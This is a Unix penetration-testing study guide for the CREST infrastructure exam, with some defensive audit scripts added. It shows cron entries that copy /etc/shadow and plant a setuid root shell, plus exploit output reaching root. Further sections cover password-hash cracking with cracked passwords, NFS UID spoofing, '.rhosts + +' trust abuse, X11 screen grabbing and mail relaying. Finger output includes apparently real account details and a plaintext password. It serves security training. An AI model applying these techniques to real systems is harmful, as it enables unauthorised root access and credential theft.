
Unix Security Assessment: Crest Infrastructure Exam Prep

Crest:
Unix Security Assessment
By Ed Williams & Dave Cash
"Practice is the master of every work." (Welsh: "Meistr pob gwaith yw ymarfer.")
Page 1 of 24
Introduction
Hi, this document is intended to give an overview of the practical Unix requirements for the CREST
infrastructure exam. It is only intended to be an overview, as some elements, such as the
vulnerabilities, will inevitably change over time. Good luck and don't panic!
1 Core Technical Skills
1.1 B13 – File System Permissions
File permission attributes within Unix and their security implications.
Excess permissions
A nasty one – watch out for people granting excessive permissions; always check cron to see if you can
write to or edit the crontab:
ls -ald /etc/cron*
If you do have write permissions to root's crontab, then adding an entry will effectively give you root. Either
copy the shadow file to /tmp, remembering to change its permissions, or give yourself a setuid shell – make
sure that the effective uid is 0.
Min  Hour  Day of month  Month  Day of week  User  Command
08   *     *             *      *            root  cp /etc/shadow /tmp/shd; chmod 777 /tmp/shd
08   *     *             *      *            root  cp /bin/sh /tmp/sh; chmod 4777 /tmp/sh
SUID
The file permissions bits include an execute permission bit for file owner, group and other. When the
execute bit for the owner is set to "s" the set user ID bit is set. This causes any persons or processes that run
the file to have access to system resources as though they are the owner of the file. When the execute bit
for the group is set to "s", the set group ID bit is set and the user running the program is given access based
on access permission for the group the file belongs to. For example, the passwd binary requires this
privilege to alter the /etc/shadow file.
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: ls -al /usr/bin/passwd
-rwsr-xr-x 1 root root 37084 2009-04-04 06:49 /usr/bin/passwd
Save text attribute (sticky bit)
If this is set on a directory such as /tmp (drwxrwxrwt), everyone can read, write and access the directory,
but the "t" indicates that only the user that created a file in this directory (and root, of course) can
delete that file. Typically, /tmp has the 'sticky' bit set.
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: ls -ald /tmp
drwxrwxrwt 12 root root 4096 2009-12-11 08:50 /tmp
Note: a capital T means that the sticky bit is set but the execute bit for other is not; likewise a capital S for setuid/setgid.
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: mkdir edward
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: sudo chmod 1000 edward
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: ls -ald !$
ls -ald edward
d--------T 2 ed ed 4096 2009-12-11 09:34 edward
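The checks in this section (setuid/setgid bits, the sticky bit and its capital S/T variants, and cron files that non-root users can write) can be scripted over ls -l output. The following is an added example, not code from the original document; it decodes the 10-character mode field and reports what a reviewer would want flagged. The ls lines it runs on are constructed samples in the same shape as the document's.

```python
"""Decode ls -l mode strings and flag the bits the B13 section cares about.

Added example, not part of the original document: it parses the 10-character
mode field that ls -l / ls -ald prints and reports setuid, setgid, sticky and
world-writable entries, including the capital S/T case (special bit set but no
execute bit) and cron files that non-root users could edit. The ls lines are
constructed samples in the same shape as the document's.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample output (mode links owner group size date time path).
SAMPLE_LS = """\
-rwsr-xr-x 1 root root 37084 2009-04-04 06:49 /usr/bin/passwd
drwxrwxrwt 12 root root 4096 2009-12-11 08:50 /tmp
d--------T 2 ed ed 4096 2009-12-11 09:34 edward
-rw-rw-rw- 1 root root 722 2009-12-11 08:00 /etc/crontab
-rwSr--r-- 1 root root 100 2009-12-11 08:00 /usr/local/bin/broken
drwx-ws--- 2 root staff 4096 2009-12-11 08:00 /srv/shared
"""

MODE_RE = re.compile(r"[-dlcbps][rwxsStT-]{9}")


def parse_mode(mode: str) -> Dict[str, object]:
    """Decode a mode string such as '-rwsr-xr-x' into its flags."""
    if not MODE_RE.fullmatch(mode):
        raise ValueError(f"not a mode string: {mode!r}")
    owner, group, other = mode[1:4], mode[4:7], mode[7:10]
    # Lower-case s/t: special bit and execute bit both set.
    # Upper-case S/T: special bit set, execute bit clear (the 'd--------T' case).
    return {
        "type": mode[0],
        "setuid": owner[2] in "sS",
        "setgid": group[2] in "sS",
        "sticky": other[2] in "tT",
        "owner_exec": owner[2] in "xs",
        "other_exec": other[2] in "xt",
        "group_writable": group[1] == "w",
        "world_writable": other[1] == "w",
    }


def is_cron_path(path: str) -> bool:
    """Paths whose contents cron executes (assumed locations for this example)."""
    return path.startswith("/etc/cron") or path.startswith("/var/spool/cron")


def audit_ls_lines(text: str) -> List[Tuple[str, List[str]]]:
    """Return (path, findings) for every ls -l line that has something to report."""
    results = []
    for line in text.splitlines():
        parts = line.split(None, 7)
        if len(parts) < 8 or not MODE_RE.fullmatch(parts[0]):
            continue
        mode, owner, group, path = parts[0], parts[2], parts[3], parts[7]
        info = parse_mode(mode)
        findings = []
        if info["setuid"]:
            suffix = "" if info["owner_exec"] else " (S: no owner execute bit)"
            findings.append(f"setuid {owner}{suffix}")
        if info["setgid"]:
            findings.append(f"setgid {group}")
        if info["sticky"] and not info["other_exec"]:
            findings.append("sticky bit without other execute (T)")
        if info["world_writable"] and info["type"] == "-":
            findings.append("world-writable file")
        if info["world_writable"] and info["type"] == "d" and not info["sticky"]:
            findings.append("world-writable directory without sticky bit")
        if is_cron_path(path) and (info["group_writable"] or info["world_writable"]):
            findings.append("cron file writable by group/other: scheduled commands can be altered")
        if findings:
            results.append((path, findings))
    return results


if __name__ == "__main__":
    for path, findings in audit_ls_lines(SAMPLE_LS):
        print(f"{path}: {'; '.join(findings)}")
```

Feed it real output with `ls -ald /etc/cron* /tmp /usr/bin/* | python3 audit_modes.py` style piping (reading stdin instead of SAMPLE_LS) and the world-writable /etc/crontab case from the "Excess permissions" paragraph shows up as two findings on one line.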
1.2 B14 – Audit Techniques
Listing processes and their associated network sockets
This can be achieved using the lsof -i command:
COMMAND   PID  USER   FD   TYPE DEVICE SIZE NODE NAME
portmap   2174 daemon 4u   IPv4 5160        UDP  *:sunrpc
portmap   2174 daemon 5u   IPv4 5176        TCP  *:sunrpc (LISTEN)
rpc.statd 2195 statd  5r   IPv4 5206        UDP  *:675
rpc.statd 2195 statd  7u   IPv4 5214        UDP  *:51362
rpc.statd 2195 statd  8u   IPv4 5217        TCP  *:57831 (LISTEN)
sshd      2474 root   3u   IPv4 5721        TCP  *:ssh (LISTEN)
sshd      2474 root   4u   IPv6 5723        TCP  *:ssh (LISTEN)
inetd     2526 root   4u   IPv4 5795        UDP  *:tftp
rwhod     2544 rwhod  3u   IPv4 5825        UDP  *:who
rwhod     2552 rwhod  3u   IPv4 5825        UDP  *:who
avahi-dae 2835 avahi  13u  IPv4 6908        UDP  *:mdns
avahi-dae 2835 avahi  14u  IPv4 6909        UDP  *:57840
cupsd     2859 root   2u   IPv6 6958        TCP  localhost:ipp (LISTEN)
cupsd     2859 root   3u   IPv4 6959        TCP  localhost:ipp (LISTEN)
dhclient  3096 root   4w   IPv4 7434        UDP  *:bootpc
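When reviewing a host, the question behind the lsof -i listing above is which of these sockets other machines can reach and which of them belong to services that carry data or credentials in clear text (tftp, rwho, sunrpc). The following is an added example, not code from the original document; it parses lsof -i lines into records, discards loopback-only listeners and established connections, and tags the rest. The lsof text is a constructed sample and the LEGACY set is this example's own assumption.

```python
"""Summarise `lsof -i` output: which sockets are reachable from other hosts.

Added example, not part of the original document. It parses the columns lsof
prints (COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME), keeps listening
TCP and bound UDP sockets, drops loopback-only ones, and tags the legacy
clear-text or RPC services the document enumerates elsewhere (tftp, who,
sunrpc, ...). The lsof text below is a constructed sample in the same shape
as the document's table; the LEGACY set is an assumption for this example.
"""
import re
from typing import Dict, List

SAMPLE_LSOF = """\
COMMAND   PID  USER   FD   TYPE DEVICE SIZE NODE NAME
portmap   2174 daemon 4u   IPv4 5160        UDP *:sunrpc
portmap   2174 daemon 5u   IPv4 5176        TCP *:sunrpc (LISTEN)
sshd      2474 root   3u   IPv4 5721        TCP *:ssh (LISTEN)
inetd     2526 root   4u   IPv4 5795        UDP *:tftp
rwhod     2544 rwhod  3u   IPv4 5825        UDP *:who
cupsd     2859 root   3u   IPv4 6959        TCP localhost:ipp (LISTEN)
sshd      3100 root   5u   IPv4 7001        TCP 192.168.226.219:ssh->192.168.226.1:50211 (ESTABLISHED)
"""

# Services that move credentials or data in clear text, or expose RPC.
LEGACY = {"tftp", "who", "sunrpc", "telnet", "ftp", "exec", "login", "shell", "finger"}

LINE_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<fd>\S+)\s+"
    r"(?P<type>IPv[46])\s+(?P<dev>\S+)\s+(?:\S+\s+)?(?P<proto>TCP|UDP)\s+(?P<name>.+?)\s*$"
)


def parse_lsof(text: str) -> List[Dict[str, str]]:
    """One dict per socket line; the header and unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        name, state = rec["name"], ""
        if name.endswith(")") and " (" in name:
            name, state = name.rsplit(" (", 1)
            state = state[:-1]                       # LISTEN, ESTABLISHED, ...
        local = name.split("->", 1)[0]               # drop the peer of connected sockets
        host, _, service = local.rpartition(":")
        rec.update(local=local, host=host, service=service, state=state)
        records.append(rec)
    return records


def exposed_sockets(text: str) -> List[str]:
    """Sockets other hosts can talk to, each tagged 'legacy/cleartext' or 'ok'."""
    out = []
    for r in parse_lsof(text):
        if r["proto"] == "TCP" and r["state"] != "LISTEN":
            continue                                  # a connection, not a listener
        if r["host"] in ("localhost", "127.0.0.1", "[::1]"):
            continue                                  # loopback only
        tag = "legacy/cleartext" if r["service"] in LEGACY else "ok"
        out.append(f"{r['cmd']}({r['pid']}) {r['proto']} {r['local']} [{tag}]")
    return out


if __name__ == "__main__":
    print("\n".join(exposed_sockets(SAMPLE_LSOF)))
```

On the sample the cupsd listener on localhost and the established sshd session drop out, leaving the five wildcard-bound sockets, four of them tagged as legacy services that the audit should question.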
Assessing patch levels
See F2
Finding interesting files (find / grep)
Inevitably you'll be required to find some interesting files. A good working knowledge of find and grep
should get you through – don't forget you can pipe find's output through xargs to grep each found file.
Figure 1: find and xargs
Grep
Figure 2: grep
2 Unix Security Assessment
2.1 F1 – Username enumeration
rusers
rusers runs as an RPC service and can be enumerated through the rpcinfo -p <ip> command.
    100002    2   udp  32776  rusersd
    100002    3   udp  32776  rusersd
    100002    2   tcp  32777  rusersd
    100002    3   tcp  32777  rusersd
To enumerate currently logged-in users issue: rusers [-l] <ip>
Figure 3: rusers usage
rwho
rwho returns users currently logged onto the system.
513/udp open|filtered who
To enumerate currently logged-in users issue: rwho [-a] <ip>
Typical output would look like the following
joe_user machine1:tty0p1 Sep 12 13:28 :11
fat_user machine1:tty1p2 Sep 12 13:59 :11
SMTP
The SMTP service runs on TCP port 25.
25/tcp open smtp Sendmail 8.8.8+Sun/SMI-SVR4
The vrfy and expn SMTP verbs can be used to enumerate legitimate users from a system.
Figure 4: smtp username enumeration
finger
The finger daemon runs on TCP port 79.
79/tcp open finger Sun Solaris fingerd
The finger daemon derives its information by doing an exact match on the user-name field in the
/etc/passwd file and a partial match in the GECOS field of the /etc/passwd file.
E.g.
finger admin@172.16.2.148
[172.16.2.148]
Login    Name                  TTY     Idle  When             Where
adm      Admin                         < .   . . . >
lp       Line Printer Admin            < .   . . . >
uucp     uucp Admin                    < .   . . . >
nuucp    uucp Admin                    < .   . . . >
listen   Network Admin                 < .   . . . >
samba    Samba Admin Call ext          < .   . . . >
ngadmin  Northgate Admin Acco          < .   . . . >
GrayD02  LBB Admin Account     pts/21  <Mar 21, 2006>         192.168.73.89
Lperrin  Oracle Sys Admin              < .   . . . >
Rvernon  Oracle Sys Admin      pts/7   <Apr 3, 2006>          192.168.73.89
Jbryant  Oracle Sys Admin              < .   . . . >
Useful finger commands (don't forget the -l switch for more information):
finger admin@172.16.2.148
finger user@172.16.2.148
finger unix@172.16.2.148
finger dba@172.16.2.148
finger oracle@172.16.2.148
And with the -l switch, which gives .plan and .project information along with last login, shell etc.:
finger -l dba@172.16.2.148
[172.16.2.148]
Login name: oracle
In real life: Oracle Account DBA Ext 1465
Directory: /home/oracle
Shell: /bin/sh
Last login Tue Apr 14, 2009 on pts/4 from lbb2k3s65.corp.
No unread mail
My Password is Cymru
Login name: oraprod
In real life: Oracle Account DBA Ext 1465
Directory: /home/oraprod
Shell: /bin/ksh
Last login Thu Apr 9, 2009 on pts/4 from lbb2ks39.corp.i
New mail received Mon Nov 9 06:57:14 2009;
unread since Sat May 26 06:00:18 2007
No Plan.
2.2 F2 – Unix vulnerabilities
Solaris (Vulnerabilities)
Not many of these (http://www.0xdeadbeef.info/) – so get a compiled list for the SPARC architecture
and run exploit suggester (http://pentestmonkey.net/tools/exploit-suggester/).
raptor_passwd (Solaris 8/9)
$ gcc raptor_passwd.c -o passwd -ldl -Wall
$ ./passwd t3mpP4ss
raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
Using SI_PLATFORM : SUNW,UltraAX-i2 (5.9)
Using stack base : 0xffbffffc
Using var address : 0xffbffb58
Using rwx_mem address : 0xff3f6004
Using sc address : 0xffbfff9c
Using ff address : 0xffbfff58
Using strcpy() address : 0xff3e0288
"Pai Mei taught you the five point palm exploding heart technique?" -- Bill
"Of course." -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)
# id;uname -a;uptime;
uid=0(root) gid=9610(gengrp) egid=3(sys)
SunOS swlbgdb 5.9 Generic sun4u sparc SUNW,UltraAX-i2
4:43pm up 147 day(s), 11:01, 3 users, load average: 0.10, 0.11, 0.12
Linux (Vulnerabilities)
Loads of local privilege escalation exploits are flying around for the Linux 2.6 kernel; the following is just an
example.
Figure 5: Linux 2.6 local exploit
Exfiltrate password hashes
Password hashes are, generally, stored in the /etc/shadow file. There are some exceptions to this, for
example, AIX stores its hashes in /etc/security/passwd.
Unix stores its passwords in a number of different formats.
DES – A series of 13 printable ASCII characters (the first two characters represent the salt itself). Maximum
password length is 8 characters. Not very good
root:xYnjRdy3g0lFw:14413::::::
MD5 - The printable form of MD5 password hashes starts with $1$. Better than DES.
yanine:$1$lfLyLkaB$TDF882DQF2ip87INNA1Uhi:14280:0:99999:7:::
SHA - The printable form of these hashes starts with $5$ or $6$ depending on which SHA variant is used.
Best yet.
root:$6$rP1wFKQN$Un1fLI3fLKgw7qESqwMOs3DhPW1bdq2JdrRCLGUxF8r8xeqQXcj.bKVllrbkSmyNSlesNJOTYLOinnpe4FypZ.:14574:0:99999:7:::
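The three formats above can be told apart mechanically, which is how an audit would find accounts still on DES or MD5 hashes. The following is an added example, not code from the original document; it applies the document's rule of thumb to each shadow entry, pulls out the salt, and lists the accounts whose hashes are weak or absent. The shadow entries are constructed samples (the root, yanine and $6$ hashes are the ones shown on this page).

```python
"""Classify the password hash schemes in an /etc/shadow-style file.

Added example, not part of the original document. It applies the document's
rule of thumb (13 printable characters = traditional DES, $1$ = MD5-crypt,
$5$/$6$ = SHA-crypt) to each shadow entry, extracts the salt, and lists the
accounts whose hashes are weak or absent. The entries are constructed
samples; the root, yanine and $6$ hashes are the ones the document shows.
"""
import re
from typing import Dict, List, NamedTuple

SAMPLE_SHADOW = """\
root:xYnjRdy3g0lFw:14413::::::
yanine:$1$lfLyLkaB$TDF882DQF2ip87INNA1Uhi:14280:0:99999:7:::
ed:$6$rP1wFKQN$Un1fLI3fLKgw7qESqwMOs3DhPW1bdq2JdrRCLGUxF8r8xeqQXcj.bKVllrbkSmyNSlesNJOTYLOinnpe4FypZ.:14574:0:99999:7:::
ops:$5$saltsalt$abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJK:14574:0:99999:7:::
daemon:*:14000:0:99999:7:::
guest::14000:0:99999:7:::
svc:!$6$abcd$locked:14000:0:99999:7:::
"""

DES_RE = re.compile(r"[./0-9A-Za-z]{13}")


class Entry(NamedTuple):
    user: str
    scheme: str   # des, md5, sha256, sha512, locked, empty or unknown
    salt: str


def classify_hash(field: str) -> str:
    """Name the scheme of one shadow password field."""
    if field == "":
        return "empty"                       # login with no password at all
    if field.startswith(("!", "*")):
        return "locked"                      # account cannot log in with a password
    if field.startswith("$1$"):
        return "md5"
    if field.startswith("$5$"):
        return "sha256"
    if field.startswith("$6$"):
        return "sha512"
    if DES_RE.fullmatch(field):
        return "des"
    return "unknown"


def salt_of(field: str, scheme: str) -> str:
    if scheme == "des":
        return field[:2]                     # first two characters are the salt
    if scheme in ("md5", "sha256", "sha512"):
        return field.split("$")[2]           # $id$salt$hash
    return ""


def parse_shadow(text: str) -> List[Entry]:
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        scheme = classify_hash(fields[1])
        entries.append(Entry(fields[0], scheme, salt_of(fields[1], scheme)))
    return entries


# Why each scheme is a finding (wording assumed for this example).
WEAK = {
    "des": "traditional DES crypt: 8-character limit, 12-bit salt",
    "md5": "MD5-crypt: fast to brute force, no configurable rounds",
    "empty": "no password set",
}


def weak_accounts(text: str) -> Dict[str, str]:
    return {e.user: WEAK[e.scheme] for e in parse_shadow(text) if e.scheme in WEAK}


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(f"{e.user:8} {e.scheme:8} salt={e.salt}")
    print("weak:", weak_accounts(SAMPLE_SHADOW))
```

Locked entries (a leading ! or *) are reported separately from empty ones, since the latter is the case that lets anyone log in; an unknown prefix is left as "unknown" rather than guessed, which is what you want when the file came from a less common Unix.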
Crack password hashes
John the ripper can be used to crack Unix based hashes (http://www.openwall.com/john/ ).
Firstly, you’ll need to combine both the /etc/passwd and /etc/shadow files so that they can be cracked.
This can be achieved with
$unshadow pwd shd > run
Once you have the one file, it can be as simple as running
$john run
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: john run
Loaded 31 password hashes with 31 different salts (Traditional DES [64/64 BS MMX])
lbbts107         (lbbts107)
sx3dev           (sx3dev)
feawards         (feawards)
lcs1             (lcs)
fujitsu          (fujitsu)
esd1             (esd)
orats            (orats734)
appco107         (appco107)
thursday         (ftpusr)
letmein1         (cfmjd)
tango1           (fppgen)
spock1           (cfm)
Furthermore, john has a lot of useful options:
john --users=root file – will attempt to crack only the root user
john --wordlist=words file – will use a dictionary-type attack
/etc/john/john.conf should be edited to change the min and max length values;
vi +333 /etc/john/john.conf will take you to the correct place.
man john will give you a full list of options, which should be read.
Check patch levels
RPM-based Linux – rpm -qa
Debian-based Linux – dpkg --list
Solaris – pkginfo -x
Derive list of missing security patches
For the Solaris patches, you will need the output of three commands, saved to three files:
uname -a
pkginfo -x
showrev -p
Make sure you have a copy of Patch Check Advanced (pca) – http://www.par.univie.ac.at/solaris/pca/
Running
./pca.pl -f . -l missings
will produce a list of missing patches; the following is an example. Note that the '.' represents the current
directory, so ensure that the three files are in the same directory.
Using /var/tmp/patchdiag.xref from Oct/29/09
Host: lbbuxfis (SunOS 5.10/Generic_118822-26/sparc/sun4u)
List: missings (116/47350)

Patch  IR   CR RSB Age Synopsis
------ -- - -- --- --- ------------------------------------------------------
120900    < 04         999 SunOS 5.10: libzonecfg Patch
121133    < 02         999 SunOS 5.10: zones library and zones utility patch
119254    < 70          67 SunOS 5.10: Install and Patch Utilities Patch
116298    < 21         999 Sun One Application Server 7.0: Java API for XML Parsing 1.2
118666 10 < 23 RS-  59 JavaSE 5.0: update 21 patch (equivalent to JDK 5.0u21)
118667 08 < 23 RS-  59 JavaSE 5.0: update 21 patch (equivalent to JDK 5.0u21), 64bit
118777    < 14 RS- 150 SunOS 5.10: Sun GigaSwift Ethernet 1.0 driver patch
118918    < 24 RS- 999 SunOS 5.10: Solaris Crypto Framework patch
138217    < 01 R-- 357 SunOS 5.10: svccfg & svcprop patch
2.3 F3 – FTP
FTP traffic in general, including the authentication process, is passed over the network in clear text. As a
result, a suitably placed attacker could sniff credentials.
Figure 6: FTP clear text
In addition, some FTP servers may be configured to allow anonymous access to a restricted file set, or
indeed the entire file system.
An FTP server can be connected to as per the screenshot below. Notice the user anonymous is used with
a password of a@a.com, although any valid email string could be used. When using the 'get' command
to retrieve files from the server, the file is always placed in the current working directory of the attacking
machine, which can be found by issuing the 'lcd' command whilst within the FTP session.
Figure 7: FTP Anonymous connection
Using this method, sensitive files may be downloaded from the host.
Figure 8: Secret file
2.4 F4 – Sendmail / SMTP
Valid username discovery via EXPN and VRFY
see username enumeration – SMTP
Sendmail Vulnerabilities
In the past, Sendmail has had loads of associated vulnerabilities so check vulnerability databases.
Mail Relaying
If an SMTP server allows internal relaying, a malicious user can use the SMTP server to send emails between
two accounts within the same domain.
This is especially useful for social engineering attacks, as mails can easily be forged and are not as
traceable as they would otherwise be. It may be that the SMTP server allows a mail to be composed but
silently drops it. While this prevents the actual mail from being sent, log files may grow due to
unsuccessful spammer attempts.
Figure 9 – SMTP mail relay
2.5 F5 – NFS
NFS Security – host level and file level
/etc/exports is the file where all the magic happens.
Root squashing, nosuid and noexec options
/data/foxwood 192.168.100.0/24(rw,root_squash,nosuid,noexec)
root_squash – maps incoming requests from user root to the anonymous uid and gid (the default).
nosuid – does not allow set-user-identifier and/or set-group-identifier bits to take effect.
noexec – does not permit execution of binaries.
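Reviewing an exports file for these options by hand is error-prone once it has more than a few lines, so the following is an added example, not code from the original document, that parses exports(5)-style entries and reports, per client, whether root squashing is in effect, whether nosuid and noexec are present, and whether the client specification is a wildcard. The exports text is a constructed sample built around the /data/foxwood line above.

```python
"""Audit /etc/exports entries against the NFS options the document lists.

Added example, not part of the original document. It parses exports(5)-style
lines (path followed by one or more client(options) groups) and reports, per
client, root squashing, the nosuid/noexec options and wildcard clients. The
exports text is a constructed sample built around the document's
/data/foxwood line.
"""
from typing import Dict, List, Tuple

SAMPLE_EXPORTS = """\
# constructed sample
/data/foxwood  192.168.100.0/24(rw,root_squash,nosuid,noexec)
/home          *(rw,no_root_squash)
/srv/pub       192.168.100.0/24(ro)  10.0.0.5(rw,sync)
/var/backup    backup.example.internal(rw,all_squash,anonuid=65534)
/legacy
"""


def parse_exports(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (path, client, options) triples.

    exports(5) allows several client(options) groups on one line, a client
    with no option list, and a path with no client at all (everyone).
    """
    out = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]
        for client in clients:
            if "(" in client:
                host, opts = client.rstrip(")").split("(", 1)
                options = [o for o in opts.split(",") if o]
            else:
                host, options = client, []
            out.append((path, host, options))
    return out


def assess_export(host: str, options: List[str]) -> List[str]:
    """Findings for one client entry; an empty list means the entry is clean."""
    findings = []
    if "no_root_squash" in options:
        findings.append("no_root_squash: a remote root keeps uid 0 on the share")
    if "nosuid" not in options:
        findings.append("nosuid missing: setuid/setgid bits on the share take effect")
    if "noexec" not in options:
        findings.append("noexec missing: binaries on the share can be executed")
    if host == "*" or host.startswith("*."):
        findings.append(f"client {host!r}: any host may mount the share")
    return findings


def audit_exports(text: str) -> Dict[str, List[str]]:
    """Map 'path client' to its findings for every entry in the file."""
    return {f"{path} {host}": assess_export(host, options)
            for path, host, options in parse_exports(text)}


if __name__ == "__main__":
    for entry, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(f"{entry}: {'; '.join(findings) or 'ok'}")
```

Because root_squash is the default, only an explicit no_root_squash is reported; the /data/foxwood entry from the page comes back clean, while the bare /legacy line (no client at all) is treated as exported to everyone, which is how exportfs reads it.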
File access through UID and GID manipulation
Altering the uid of the user you are currently mounted as will allow you to access the files. For example:
The first step is to check if the nfs / mountd services are running through the rpcinfo command. As there
are, check the available shares on that host through the showmount command:
Figure 10 – RPC Enumeration / available shares
From here, you’ll need to create a directory to act as your mount point. Following that, issue the mount
command and browse to the mount point.
Figure 11 – Mounting share
As you can see, the 'ed' user attempts to redirect a "+ +" into the .rhosts file, which you can see has the
permissions rw-r--r--.
Figure 12 – Attempting to write to a file
The next step is to create a new user with the same uid (1337). This is achieved with the following
command:
adduser --uid 1337 stest
Next,
su – stest
Change directory back to the mount point and you should now have access to the previously
unreadable files.
Figure 13 – Gaining Access
2.6 F6 – R* Services
Berkeley remote services, commonly known as the r-services (not shown are rusers, rwho and rcp).
512/tcp open exec
513/tcp open login
514/tcp open shell
Access control (/etc/hosts.equiv and .rhosts)
/etc/hosts.equiv
This is a system-level file that defines trusted hostnames or IP addresses that can freely access the r-services.
It works in a similar way to .rhosts; the main difference is that you cannot authenticate / connect as the
root user through this file.
.rhosts
This is a user-based file that exists in $HOME; its use can allow unauthenticated access across different
hosts. It generally has the format "hostname user"; however, a "+ +" would allow a connection from any host
as any user (including root).
When a user connects to the host running rshd the source IP address is cross referenced against the .rhosts
file and the username is verified by querying the identd service running at the source.
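The "+ +" entry described above is the thing to look for when reviewing hosts.equiv and .rhosts files across an estate. The following is an added example, not code from the original document; it parses the "hostname [username]" entries (with the leading "-" deny form and "@netgroup" names) and reports every entry that trusts any host, any user, or both. The file contents are constructed samples.

```python
"""Flag trust entries in hosts.equiv / .rhosts that open an account to everyone.

Added example, not part of the original document. Each entry in these files
is 'hostname [username]'; '+' is a wildcard for either field, a leading '-'
denies, and '@name' refers to a netgroup. The checker reports the '+ +'
pattern the R-services section warns about, plus single-field wildcards.
The file contents are constructed samples.
"""
from typing import List, Tuple

SAMPLE_RHOSTS = """\
devbox.example.internal ed
+ +
backup.example.internal
+ ed
-badhost.example.internal
@trusted +
"""


def parse_rhosts(text: str) -> List[Tuple[str, str, bool]]:
    """(host, user, negated) per entry; user is '' when the line has none."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else ""
        negated = host.startswith("-")
        if negated:
            host = host[1:]
        entries.append((host, user, negated))
    return entries


def risky_entries(text: str) -> List[str]:
    """Entries that trust every host, every user, or both."""
    out = []
    for host, user, negated in parse_rhosts(text):
        if negated:
            continue                       # explicit deny, not a trust
        if host == "+" and user == "+":
            out.append("'+ +': any user from any host may log in as this account")
        elif host == "+":
            out.append(f"'+ {user}': user {user} trusted from any host")
        elif user == "+":
            out.append(f"'{host} +': any user on {host} may log in as this account")
    return out


if __name__ == "__main__":
    print("\n".join(risky_entries(SAMPLE_RHOSTS)))
```

An entry with a hostname and no user ("backup.example.internal") only trusts the same username from that host and is not reported; the netgroup line is still flagged because its user field is the wildcard.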
Trust Relationships
As mentioned above.
Impact of poorly configured trust relationships
If a system becomes compromised, then a quick find for an .rhosts file could allow unauthenticated
access to other, sensitive, hosts.
2.7 F7 – X11
X servers listen on TCP ports 6000 to 6063 (depending on the number of concurrent displays).
Interesting ports on 172.16.2.148:
6000/tcp open X11
6001/tcp open X11:1
6003/tcp open X11:3
6005/tcp open X11:5
Grabbing screens
If host-based security has been opened with an xhost +, then it is possible to remotely 'grab' the current
screen with the following:
xwd -root -display <ip>:0 | xwud
or use x-dumper.sh.
As you can see, from a Linux terminal a solaris screen has been ‘grabbed’.
Figure 14: Screen grabbing through X11
The two authentication mechanisms within X windows are xhost and xauth, which are discussed below.
Host Based Security
Host based X authentication allows users to specify which IP address and hosts have access to the xserver. The xhost command is used with a + and – options to allow and deny X access from individual
hosts (i.e. xhost +192.168.226.200). If the + option is used with no address, any remote host can access
the X server.
User Based Security
When a legitimate user logs in locally to X windows, a magic cookie is placed into the .Xauthority file
under $HOME. The .Xauthority file contains one cookie for each X display the user can use; this can be
manipulated using the xauth utility.
Both host-based and user-based security are used over unencrypted protocols and should / can
be tunnelled through ssh.
2.8 F8 – RPC services
RPC Service Enumeration
This can be achieved in a number of ways; if the portmapper service is running (TCP/UDP 111), run:
rpcinfo -p <ip>
The following is an example from a default solaris 10 installation.
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100232   10   udp  32772
    100083    1   tcp  32771
    100221    1   tcp  32772
    100068    2   udp  32773
    100068    3   udp  32773
    100068    4   udp  32773
    100068    5   udp  32773
    100229    1   tcp  32773
    100229    2   tcp  32773
    100230    1   tcp  32774
    100242    1   tcp  32775
    100422    1   tcp  32776
    100011    1   udp  32774  rquotad
    100001    2   udp  32775  rstatd
    100001    3   udp  32775  rstatd
    100001    4   udp  32775  rstatd
    100002    2   udp  32776  rusersd
    100002    3   udp  32776  rusersd
    100002    2   tcp  32777  rusersd
    100002    3   tcp  32777  rusersd
    100008    1   udp  32777  walld
    100012    1   udp  32778  sprayd
    100153    1   udp  32779
    100021    1   udp   4045  nlockmgr
    100021    2   udp   4045  nlockmgr
    100021    3   udp   4045  nlockmgr
    100021    4   udp   4045  nlockmgr
    100021    1   tcp   4045  nlockmgr
    100021    2   tcp   4045  nlockmgr
    100021    3   tcp   4045  nlockmgr
    100021    4   tcp   4045  nlockmgr
    100024    1   udp  32788  status
    100024    1   tcp  32778  status
    100133    1   udp  32788
    100133    1   tcp  32778
    300598    1   udp  32856
    300598    1   tcp  32823
    100249    1   udp  32857
    100249    1   tcp  32824
 805306368    1   udp  32856
 805306368    1   tcp  32823
    100005    1   udp  58102  mountd
    100005    2   udp  58102  mountd
    100005    3   udp  58102  mountd
    100005    1   tcp  39586  mountd
    100005    2   tcp  39586  mountd
    100005    3   tcp  39586  mountd
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
Good ol' nmap can take care of this too: nmap -sR <ip> can also be used to enumerate RPC services.
C:\Documents and Settings\Ed Williams>nmap -sR 192.168.226.200
Interesting ports on 192.168.226.200:
Not shown: 976 closed ports
PORT      STATE SERVICE                 VERSION
